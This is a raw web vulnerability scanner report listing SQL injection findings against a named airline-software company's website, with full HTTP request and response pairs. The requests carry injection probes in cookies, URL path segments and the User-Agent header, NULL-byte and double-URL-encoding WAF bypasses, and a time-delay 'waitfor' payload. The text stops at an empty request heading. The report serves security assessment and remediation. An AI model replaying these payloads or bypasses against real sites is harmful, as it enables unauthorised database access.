GET /home/products_services/product/sabre_aircentre_acars_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322611; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_crew%2F%22%3Bi%3A1%3Bs%3A34%3A%22%2Fproducts_services%2Fdeveloper_tool%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fproducts_services%2Fagent_sales_report%2F%22%3Bi%3A3%3Bs%3A53%3A%22%2Fproducts_services%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D%00'';
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:47:55 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_crew_control/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322045; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A1%3Bs%3A54%3A%22%2Fproducts_services%2Fproduct%2Fsabre_gds_display_analysis%2F%22%3Bi%3A2%3Bs%3A80%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing_for_third-party_ground_handling%2F%22%3Bi%3A3%3Bs%3A46%3A%22%2Fproducts_services%2Fproduct%2Fagent_sales_report%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fcorporate_management%2F%22%3B%7D;
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/product/sabre_aircentre_crew_manager'/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
Response 1 (redirected)
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 02:21:46 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_crew_manager''/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322049; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
The exp_last_visit cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the exp_last_visit cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00'; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:54:18 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_crew_qualifier/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086%00''; __utmc=178985382; exp_last_activity=1286322054; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A57%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts_services%2Fproduct%2Fweb_services%2F%22%3Bi%3A2%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Fsabresonic_inventory%2F%22%3B%7D;
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00'; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:57:22 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_flight_explorer HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382%00''; exp_last_activity=1286322636; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fproducts_services%2Fservices%2Fairline_community%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A3%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_aircentre_staff_manager%2F%22%3Bi%3A4%3Bs%3A37%3A%22%2Fproducts_services%2Fmultitask_manager%2F%22%3B%7D;
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:33:03 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_flight_plan_manager HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322639; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A41%3A%22%2Fproducts_services%2Ftechnical_records_hub%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_aircentre_flight_explorer%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fsabre_aircentre_gate_planner%2F%22%3B%7D;
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the User-Agent HTTP header. The application took 55344 milliseconds to respond to the request, compared with 26406 milliseconds for the original request, indicating that the injected SQL command caused a time delay.
The database appears to be Microsoft SQL Server.
Request
GET /home/products_services/product/sabre_aircentre_load_manager/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)')waitfor%20delay'0%3a0%3a20'-- Connection: close Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322107; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3Bi%3A1%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_roster_maker%2F%22%3Bi%3A2%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Fsabre_qik_analysis_system%2F%22%3Bi%3A3%3Bs%3A42%3A%22%2Fproducts_services%2Fproduct%2Fdeveloper_tool%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fproduct%2Felectronic_ticketing%2F%22%3B%7D;
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:33:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_aircentre_movement_control HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322670; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fautomated_exchange_and_refunds%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fincludes%2Fform_adi%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts_services%2Fairline_reservations%2F%22%3Bi%3A3%3Bs%3A51%3A%22%2Fproducts_services%2Fsabre_airvision_network_manager%2F%22%3Bi%3A4%3Bs%3A10%3A%22%2Fincludes%2F%22%3B%7D;
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00'; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
Response 1
HTTP/1.1 200 OK Date: Wed, 06 Oct 2010 01:52:21 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home/products_services/product/sabre_revenue_integrity/ HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product/sabre_reaccommodation_manager/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1%00''; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322292; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts_services%2Fairports%2F%22%3Bi%3A2%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3Bi%3A3%3Bs%3A56%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_load_manager%2F%22%3Bi%3A4%3Bs%3A58%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_crew_qualifier%2F%22%3B%7D;
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /home%2527/products_services/product/technical_records_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
Response 1
HTTP/1.1 404 Not Found Date: Wed, 06 Oct 2010 03:21:30 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Content-Length: 226 Connection: close Content-Type: text/html
Database Error: Unable to connect to your database. Your database appears to be turned off or the database connection settings in your config file are not correct. Please contact your hosting provider if the proble ...[SNIP]...
Request 2
GET /home%2527%2527/products_services/product/technical_records_hub HTTP/1.1 Host: www.sabreairlinesolutions.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.sabreairlinesolutions.com/home/products_services/product_index/ Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286302664.2; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322892; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A53%3A%22%2Fproducts_services%2Fproduct%2Ffrequent_flyer_management%2F%22%3Bi%3A1%3Bs%3A61%3A%22%2Fproducts_services%2Fproduct%2Fsabre_airvision_profit_essentials%2F%22%3Bi%3A2%3Bs%3A55%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_staff_admin%2F%22%3Bi%3A3%3Bs%3A65%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_airspace_flow_manager%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
